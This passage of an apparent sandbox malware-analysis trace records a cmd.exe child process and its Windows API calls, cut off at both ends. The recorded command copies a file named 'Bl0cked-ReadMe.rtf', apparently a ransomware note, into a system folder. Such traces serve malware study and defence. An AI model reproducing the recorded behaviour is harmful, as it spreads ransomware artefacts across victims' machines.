(hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.167] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.167] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.167] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.167] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.168] SetConsoleInputExeNameW () returned 0x1 [0152.168] GetConsoleOutputCP () returned 0x1b5 [0152.168] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.168] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.168] exit (_Code=0) Process: id = "246" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xd1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20195 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20196 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20197 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20198 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 20199 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20200 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20201 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20202 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20203 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 20204 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20252 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20253 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20254 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20255 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 20256 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 20257 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20258 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20259 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20260 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20261 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20262 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20263 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20264 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20265 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20266 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20267 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20268 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20269 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 20270 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 20271 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 20272 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 20273 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 20274 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 20275 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 309 os_tid = 0xc2c [0152.036] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfe4c | out: lpSystemTimeAsFileTime=0x2cfe4c*(dwLowDateTime=0x948e4f00, dwHighDateTime=0x1d440a9)) [0152.037] GetCurrentProcessId () returned 0xd1c [0152.037] GetCurrentThreadId () returned 0xc2c [0152.037] GetTickCount () returned 0x2eed0 [0152.037] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfe44 | out: lpPerformanceCount=0x2cfe44*=20882588803) returned 1 [0152.037] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0152.037] __set_app_type (_Type=0x1) [0152.037] __p__fmode () returned 0x76b331f4 [0152.038] __p__commode () returned 0x76b331fc [0152.038] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0152.038] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0152.038] GetCurrentThreadId () returned 0xc2c [0152.038] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc2c) returned 0x38 [0152.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.038] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0152.038] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.038] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0152.038] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfddc | out: phkResult=0x2cfddc*=0x0) returned 0x2 [0152.038] VirtualQuery (in: lpAddress=0x2cfe13, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.039] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0152.039] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0152.039] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.039] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfdac, dwLength=0x1c | out: lpBuffer=0x2cfdac*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0152.039] GetConsoleOutputCP () returned 0x1b5 [0152.039] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.039] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0152.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.039] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0152.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.039] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.039] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.040] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.040] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.040] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.040] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0152.040] GetEnvironmentStringsW () returned 0x4701b0* [0152.040] FreeEnvironmentStringsW (penv=0x4701b0) returned 1 [0152.040] GetEnvironmentStringsW () returned 0x4701b0* [0152.040] FreeEnvironmentStringsW (penv=0x4701b0) returned 1 [0152.040] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ced4c | out: phkResult=0x2ced4c*=0x40) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0xe8, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x1, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x1, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x0, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x40, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x40, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x40, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegCloseKey (hKey=0x40) returned 0x0 [0152.041] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ced4c | out: phkResult=0x2ced4c*=0x40) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x40, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x1, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x1, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x0, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x9, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x4, lpData=0x2ced58*=0x9, lpcbData=0x2ced50*=0x4) returned 0x0 [0152.041] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ced54, lpData=0x2ced58, lpcbData=0x2ced50*=0x1000 | out: lpType=0x2ced54*=0x0, lpData=0x2ced58*=0x9, lpcbData=0x2ced50*=0x1000) returned 0x2 [0152.041] RegCloseKey (hKey=0x40) returned 0x0 [0152.041] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637a [0152.041] srand (_Seed=0x5b88637a) [0152.041] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"" [0152.041] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf\"" [0152.042] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.042] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x471910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0152.042] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.042] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.042] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.042] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0152.042] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0152.042] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0152.042] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0152.042] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0152.042] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0152.042] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0152.042] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0152.042] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0152.043] GetEnvironmentStringsW () returned 0x472300* [0152.043] FreeEnvironmentStringsW (penv=0x472300) returned 1 [0152.043] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.043] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.043] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0152.043] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0152.043] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0152.043] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0152.043] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0152.043] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0152.043] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0152.043] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0152.043] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfb18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.043] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfb18, lpFilePart=0x2cfb14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfb14*="Desktop") returned 0x18 [0152.043] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.043] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf894 | out: lpFindFileData=0x2cf894) returned 0x470040 [0152.044] FindClose (in: hFindFile=0x470040 | out: hFindFile=0x470040) returned 1 [0152.044] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf894 | out: lpFindFileData=0x2cf894) returned 0x470040 [0152.044] FindClose (in: hFindFile=0x470040 | out: hFindFile=0x470040) returned 1 [0152.044] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf894 | out: lpFindFileData=0x2cf894) returned 0x470040 [0152.044] FindClose (in: hFindFile=0x470040 | out: hFindFile=0x470040) returned 1 [0152.044] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.044] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0152.044] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0152.044] GetEnvironmentStringsW () returned 0x472b20* [0152.044] FreeEnvironmentStringsW (penv=0x472b20) returned 1 [0152.044] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.045] GetConsoleOutputCP () returned 0x1b5 [0152.045] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.045] GetUserDefaultLCID () returned 0x409 [0152.045] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfc58, cchData=128 | out: lpLCData="0") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfc58, cchData=128 | out: lpLCData="0") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfc58, cchData=128 | out: lpLCData="1") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0152.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0152.046] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0152.047] GetConsoleTitleW (in: lpConsoleTitle=0x460900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.047] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.047] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0152.047] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0152.048] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0152.048] _wcsicmp (_String1="type", _String2=")") returned 75 [0152.048] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0152.048] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0152.048] _wcsicmp (_String1="IF", _String2="type") returned -11 [0152.048] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0152.048] _wcsicmp (_String1="REM", _String2="type") returned -2 [0152.049] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0152.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.053] GetFileType (hFile=0x7) returned 0x2 [0152.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.172] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cfb50 | out: lpMode=0x2cfb50) returned 1 [0152.172] _dup (_FileHandle=1) returned 3 [0152.172] _close (_FileHandle=1) returned 0 [0152.173] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0152.173] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cfb20, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0152.174] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0152.174] GetConsoleTitleW (in: lpConsoleTitle=0x2cf950, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.174] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0152.174] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0152.174] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0152.175] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0152.175] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.176] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cf4b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf4b4) returned 0x460eb0 [0152.176] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0152.176] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0152.176] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0152.176] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ce3c0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0152.176] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0152.176] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.176] GetFileType (hFile=0x54) returned 0x1 [0152.176] _get_osfhandle (_FileHandle=4) returned 